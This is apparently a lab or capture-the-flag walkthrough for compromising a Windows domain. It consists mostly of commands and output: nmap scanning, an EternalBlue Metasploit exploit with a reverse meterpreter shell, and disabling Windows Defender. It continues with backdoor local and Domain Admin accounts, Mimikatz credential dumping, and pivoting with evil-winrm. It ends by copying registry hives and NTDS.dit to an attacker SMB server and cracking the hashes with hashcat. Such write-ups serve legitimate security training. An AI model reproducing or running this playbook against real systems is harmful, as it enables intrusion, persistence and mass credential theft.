# Intro
* Scan a target machine for vulnerabilities.
* Gain intial access using Mestasploit.
* Eleveate privileges to Domain Admin using Mimikatz.
* Crack AD Passwords.


Presented with an unknown subnet (10.10.10.0/24) we are required to enumerate the network, and gain access to a Domain Controller.
Compromise an account with Domain Administrator Privileges for the MENDAWGS.TTV domain.
Get a shell on the DC.
Locate flag.txt
Exfil copy of AD to kali.


# Enumerate the network

My tool of choice is nmap. There are some quirks to be aware of with nmap and privileges on kali:

## Discovery Scan 
Run the command: `sudo nmap -sP -oA discovery 10.10.10.0/24`  (-oA outputs in all formats, which is nice.)

```
cat discovery.gnmap
# Nmap 7.92 scan initiated Mon Feb 21 19:54:28 2022 as: nmap -sP -oA discovery 10.10.10.0/24
Host: 10.10.10.1 ()     Status: Up
Host: 10.10.10.2 ()     Status: Up
Host: 10.10.10.3 ()     Status: Up
```
At this point in time, you should be logging this information.

DTG / User / Source IP / Dest IP / Command / Result / Remarks.

We have now identified there are 3 hosts on the network. We know pfSense is one, so lets identify which one is the DC

## Port Scan

Once again, using nmap we can scan for open ports in order to identify the role of the box:

```
# nmap -sC -sV -oA ports 10.10.10.2 10.10.10.3
# python3 nmap2md.py ports.xml (not necessary.. but good for info.)

```
nmap2md.py gives us this output seen below

#### 10.10.10.2 

| Port | State | Service | Version |
|------|-------|---------|---------|
| 135/tcp | open | msrpc | Microsoft Windows RPC  |
| 139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn  |
| 3268/tcp | open | ldap | Microsoft Windows Active Directory LDAP  |
| 3269/tcp | open | tcpwrapped |   |
| 389/tcp | open | ldap | Microsoft Windows Active Directory LDAP  |
| 445/tcp | open | microsoft-ds | Windows Server 2016 Standard Evaluation 14393 microsoft-ds  |
| 464/tcp | open | kpasswd5 |   |
| 53/tcp | open | domain | Simple DNS Plus  |
| 593/tcp | open | ncacn_http | Microsoft Windows RPC over HTTP 1.0 |
| 636/tcp | open | tcpwrapped |   |
| 88/tcp | open | kerberos-sec | Microsoft Windows Kerberos  |

#### 10.10.10.3

| Port | State | Service | Version |
|------|-------|---------|---------|
| 135/tcp | open | msrpc | Microsoft Windows RPC  |
| 139/tcp | open | netbios-ssn | Microsoft Windows netbios-ssn  |
| 445/tcp | open | microsoft-ds | Windows 8.1 Pro 9600 microsoft-ds  |
| 49155/tcp | open | msrpc | Microsoft Windows RPC  |

Based on the outputs we can assume `.2` is the DC, and `.3` is a workstation. Both have port 445 open. Lets dig into that.

# SMB Enumeration. 

`sudo nmap -script smb-vuln*.nse -oA smb -script-args=unsafe=1 -p445 10.10.10.3`

Runs all the smb-vuln scripts. 

```
Host script results:
|_smb-vuln-ms10-054: ERROR: Script execution failed (use -d to debug)
|_smb-vuln-ms10-061: NT_STATUS_ACCESS_DENIED
| smb-vuln-ms17-010: 
|   VULNERABLE:
|   Remote Code Execution vulnerability in Microsoft SMBv1 servers (ms17-010)
|     State: VULNERABLE
|     IDs:  CVE:CVE-2017-0143
|     Risk factor: HIGH
|       A critical remote code execution vulnerability exists in Microsoft SMBv1
|        servers (ms17-010).
|           
|     Disclosure date: 2017-03-14
|     References:
|       https://blogs.technet.microsoft.com/msrc/2017/05/12/customer-guidance-for-wannacrypt-attacks/
|       https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-0143
|_      https://technet.microsoft.com/en-us/library/security/ms17-010.aspx

```
Reading the output, MS17-010 is vulnerable. It even gives you a handy little link. 

Lets enumerate the shares available prior to smacking it with EternalBlue. Usually the guest account isnt disabled, lets use it to enumerate the shares.

```
# smbmap -H 10.10.10.3 -u Guest
[+] Guest session       IP: 10.10.10.3:445      Name: 10.10.10.3                                        
        Disk                                                    Permissions     Comment
        ----                                                    -----------     -------
        ADMIN$                                                  NO ACCESS       Remote Admin
        C$                                                      NO ACCESS       Default share
        IPC$                                                    READ ONLY       Remote IPC
        Users                                                   READ ONLY
        Work Stuff                                              READ ONLY
```

We have read access to `Users` and `Work Stuff`. Use smbclient to list and download the files. Just enter a blank password.

```
# smbclient \\\\10.10.10.3\\"Work Stuff" -U Guest                                                                                                                                                                                   
Enter WORKGROUP\Guest's password: 
Try "help" to get a list of possible commands.
smb: \> ls
  .                                   D        0  Wed Jan 19 23:44:09 2022
  ..                                  D        0  Wed Jan 19 23:44:09 2022
  blah.txt.txt                        A        4  Tue Feb  8 21:07:51 2022

                15728127 blocks of size 4096. 12071301 blocks available
smb: \> get blah.txt.txt
getting file \blah.txt.txt of size 4 as blah.txt.txt (0.1 KiloBytes/sec) (average 0.1 KiloBytes/sec)
smb: \> exit
                                                                                                                                                               
# cat blah.txt.txt                             
blah                                 
```
So the share is definately readable. Blah has only got one line in it. Nothing usefull. Lets bring out the sledgehammer.
# Metasploit

```
Module options (exploit/windows/smb/ms17_010_psexec):

   Name                  Current Setting                                                 Required  Description
   ----                  ---------------                                                 --------  -----------
   DBGTRACE              false                                                           yes       Show extra debug trace info
   LEAKATTEMPTS          99                                                              yes       How many times to try to leak transaction
   NAMEDPIPE                                                                             no        A named pipe that can be connected to 
   NAMED_PIPES           /usr/share/metasploit-framework/data/wordlists/named_pipes.txt  yes       List of named pipes to check
   RHOSTS                10.10.10.3                                                      yes       The target host(s), see...
   RPORT                 445                                                             yes       The Target port (TCP)
   SERVICE_DESCRIPTION                                                                   no        Service description to to be used on ..
   SERVICE_DISPLAY_NAME                                                                  no        The service display name
   SERVICE_NAME                                                                          no        The service name
   SHARE                 ADMIN$                                                          yes       The share to connect to...
   SMBDomain             .                                                               no        The Windows domain to use for authentication
   SMBPass                                                                               no        The password for the specified username
   SMBUser                                                                               no        The username to authenticate as


Payload options (windows/meterpreter/reverse_tcp):

   Name      Current Setting  Required  Description
   ----      ---------------  --------  -----------
   EXITFUNC  thread           yes       Exit technique (Accepted: '', seh, thread, process, none)
   LHOST     10.10.20.100     yes       The listen address (an interface may be specified)
   LPORT     9696             yes       The listen port


Exploit target:

   Id  Name
   --  ----
   0   Automatic


msf6 exploit(windows/smb/ms17_010_psexec) > run

[*] Started reverse TCP handler on 10.10.20.100:9696 
[*] 10.10.10.3:445 - Target OS: Windows 8.1 Pro 9600
[*] 10.10.10.3:445 - Built a write-what-where primitive...
[+] 10.10.10.3:445 - Overwrite complete... SYSTEM session obtained!
[*] 10.10.10.3:445 - Selecting PowerShell target
[*] 10.10.10.3:445 - Executing the payload...
[+] 10.10.10.3:445 - Service start timed out, OK if running a command or non-service executable...
[*] Sending stage (175174 bytes) to 10.10.10.3
[*] Meterpreter session 1 opened (10.10.20.100:9696 -> 10.10.10.3:49220 ) at 2022-02-21 20:57:03 -0500

meterpreter > 

```
Configure the approprate options as shown. And you will now have access to the box.
I usually migrate to another process, but leave LSASS alone. 
First step should be to deactivate windows defender
# Disable Defender

```
meterpreter> execute -H -i -f cmd.exe
(shell) reg query "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Defender"
(shell) reg add "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows Defender" /t REG_DWORD /v DisableAntiSpyware /d 0x1 /f
```
Now create a local admin

```
net user /add not_a_hacker P@ssw0rd!
net localgroup administrators /add not_a_hacker
```

Dump creds.
```
meterpreter> load kiwi
meterpreter> creds_all
....
wdigest credentials
===================
Username       Domain    Password
--------       ------    --------
joshua.mennen  MENDAWGS  Cyberz!1
...
```
WDigest credentials are logon creds stored in the memory of LSASS.exe. This is enabled by default. Joshua.Mennen has been logged into the box, so his creds are stored. 

From here we can now use these credentials to authenticate to the DC.

# Pivot to DC
My favourite tool of choice for this situation is evil-winrm. It can be installed quite easily via the package manager. Once installed, run it with:
`evil-winrm -i 10.10.10.2 -u Joshua.Mennen -p Cyberz\!1`
Note, the ! has to be escaped.

```
evil-winrm -i 10.10.10.2 -u Joshua.Mennen -p Cyberz\!1

Evil-WinRM shell v3.3

Warning: Remote path completions is disabled due to ruby limitation: quoting_detection_proc() function is unimplemented on this machine

Data: For more information, check Evil-WinRM Github: https://github.com/Hackplayers/evil-winrm#Remote-path-completion

Info: Establishing connection to remote endpoint

*Evil-WinRM* PS C:\Users\joshua.mennen\Documents> 
```
## Dump Hives
Using evil-winrm dump the registry hives.
```
*Evil-WinRM* PS C:\Users\joshua.mennen\AppData\Local\Temp> reg.exe save hklm\sam sam.save
The operation completed successfully.

*Evil-WinRM* PS C:\Users\joshua.mennen\AppData\Local\Temp> reg.exe save hklm\system system.save
The operation completed successfully.

*Evil-WinRM* PS C:\Users\joshua.mennen\AppData\Local\Temp> reg.exe save hklm\security security.save
The operation completed successfully.

*Evil-WinRM* PS C:\Users\joshua.mennen\AppData\Local\Temp> download *.save
Info: Downloading *.save to ./*.save

                                                             
Info: Download successful!

*Evil-WinRM* PS C:\Users\joshua.mennen\AppData\Local\Temp> del *.save
```
## Dump NTDS
First up, inside the evil-winrm create a shadow copy of the C:
`vssadmin create shadow /for=C:`
It will spit out the correct path, mine is an example below.
`cmd.exe /c "copy \\?\GLOBALROOT\Device\HarddiskVolumeShadowCopy1\windows\ntds\ntds.dit C:\windows\temp\ntds.dit"`

On kali, setup an smb server to receive the file.: 
`smbserver.py TEST . -smb2support`

Back at the Evil-Winrm prompt, copy it across:
`copy C:\windows\temp\ntds.dit \\10.10.20.100\TEST\`

## Create a domain user.
This will enable us to rejoin the box if required.
`net user not_a_hacker_dc /domain /add P@ssw0rd1`
`net group "Domain Admins" /add /domain not_a_hacker_dc`

The tradecraft here is pretty sloppy. This whole thing has been a smash and grab.

## Complete Actions on the objective
Find flag.txt
`type C:\Secrets\flag.txt`

# Dump the Secrets / Crack the hashes.
Once you have obtained the following files, you can crack the domain passwords:

- SAM 
- SYSTEM
- SECURITY
- NTDS.dit

There are plenty of methods available, however I will use impackets secretsdump.py
`secretsdump.py -sam sam.save -system system.save -security security.save -ntds ntds.dit LOCAL`

It'll output a LOT of credentials.

#### Local SAM
```
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f58127cd36a2e485e154607d42bb4e6e:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
```
####  Domain Creds
```
Administrator:500:aad3b435b51404eeaad3b435b51404ee:f58127cd36a2e485e154607d42bb4e6e:::
NO_GUEST:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WINDC001$:1000:aad3b435b51404eeaad3b435b51404ee:c7f6389839ef3408fa140d5c4c794fa5:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:2a908c46e42fbf3ffeed2d22001b6698:::
MENDAWGS.TTV\joshua.mennen:1103:aad3b435b51404eeaad3b435b51404ee:d213cdcc9de10bd947aa081f121196ac:::
WINWK001$:1104:aad3b435b51404eeaad3b435b51404ee:8e0b04f4e5ff2adf699eabe3176ad026:::
MENDAWGS.TTV\victor.vondoom:1105:aad3b435b51404eeaad3b435b51404ee:c39f2beb3d2ec06a62cb887fb391dee0:::
MENDAWGS.TTV\johann.shmidt:1106:aad3b435b51404eeaad3b435b51404ee:ece7fcdc57e31144fdf8543f3b1ddf94:::
MENDAWGS.TTV\loki.odinson:1107:aad3b435b51404eeaad3b435b51404ee:649072ab370c9ff11be173334f7c04a6:::
MENDAWGS.TTV\thor.odinson:1109:aad3b435b51404eeaad3b435b51404ee:79cab130562c6caba7c8fba06ec18672:::
MENDAWGS.TTV\steve.rogers:1111:aad3b435b51404eeaad3b435b51404ee:32ac549aed2eecfb4a6f0182a8e54eb6:::
MENDAWGS.TTV\peter.parker:1112:aad3b435b51404eeaad3b435b51404ee:82b2aeb9045d70d3469381c18b93ecb2:::
MENDAWGS.TTV\kali:2101:aad3b435b51404eeaad3b435b51404ee:217e50203a5aba59cefa863c724bf61b:::
```
##  Prep for cracking
We need to format these correctly for hashcat to be able to crack them. The current format is:
`domain\uid:rid:lmhash:nthash` And we only want to crack the nthash, so whack em into a file and remove the excess.

```
f58127cd36a2e485e154607d42bb4e6e
31d6cfe0d16ae931b73c59d7e0c089c0
31d6cfe0d16ae931b73c59d7e0c089c0
c7f6389839ef3408fa140d5c4c794fa5
2a908c46e42fbf3ffeed2d22001b6698
d213cdcc9de10bd947aa081f121196ac
8e0b04f4e5ff2adf699eabe3176ad026
c39f2beb3d2ec06a62cb887fb391dee0
ece7fcdc57e31144fdf8543f3b1ddf94
649072ab370c9ff11be173334f7c04a6
79cab130562c6caba7c8fba06ec18672
32ac549aed2eecfb4a6f0182a8e54eb6
82b2aeb9045d70d3469381c18b93ecb2
217e50203a5aba59cefa863c724bf61b
```
## Cracking
Using hashcat, rockyou and some rules you can get alot of these passwords quite easliy.
`sudo hashcat -a 0 -m 1000 -r /usr/share/hashcat/rules/dive.rule hashes.txt /usr/share/wordlists/rockyou.txt`

Cracking on a VM isnt the best COA. Get hashcat on your laptop/gaming pc and itll have a SIGNIFICANTLY improved hashrate.
~21 hrs vs ~15mins


# Cracking the Provided Hives/Database
Same process as above. extract them, and crack them. The passwords in these hives are definately inside the rockyou wordlist. Rules are not needed to crack these ones.

